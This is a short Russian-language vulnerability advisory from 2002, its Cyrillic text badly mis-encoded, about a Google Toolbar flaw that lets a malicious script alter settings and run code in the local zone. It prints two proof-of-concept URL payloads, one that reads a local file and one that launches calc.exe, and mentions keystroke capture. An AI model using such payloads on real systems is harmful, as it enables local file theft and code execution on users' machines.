»зменение конфигурации и выполнение произвольного кода в Google Toolbar

ƒата публикации:
13.08.2002
¬сего просмотров:
758
ќпасность:
Ќаличие исправлени€:
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
¬оздействие:
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
ќписание: Google Toolbar - ActiveX control дл€ Microsoft Internet Explorer, который обеспечивает функциональность поисковой системы Google.

ќбнаруженна€ у€звимость позвол€ет измен€ть параметры настройки конфигурации, посеща€ определенный URL (http://toolbar.google.com/command?), который принимает команды как CGI параметры. «лонамеренный сценарий может непосредственно обратитьс€ к этому URL, переадресовыва€ на страницу, котора€ ссылаетс€ на доверенный сайт, типа домена google.com. ”€звимость позвол€ет изменить конфигурацию панели инструментов, и выполн€ть произвольный код в пределах Local System security zone. ѕример:

1. „тение локальных файлов:

"http://toolbar.google.com/command?script=document.body.insertAdjacentHTML
('beforeEnd','<iframe id=oFileRead src=file://c:/test.txt></iframe>'); setTimeout
(function () { alert(oFileRead.document.documentElement.innerText) },1000)"
2. ¬ыполнение произвольных программ:
"http://toolbar.google.com/command?script=document.body.insertAdjacentHTML
('beforeEnd','<object classid=clsid:10101010-1111-1111-1111-111111111111 
codebase=c:/winnt/system32/calc.exe style=display:none></object>')".
и т.п. “акже сообщаетс€, что в некоторых верси€х Google keypress событи€ посылаютс€ основному окну браузера. «лонамеренный сценарий в текущем окне браузера может контролировать нажатие клавиш.

у€звимость обнаружена в Google Toolbar 1.1.41- 1.1.58

—сылки: Exploiting the Google toolbar (GM#001-MC)

или введите им€

CAPTCHA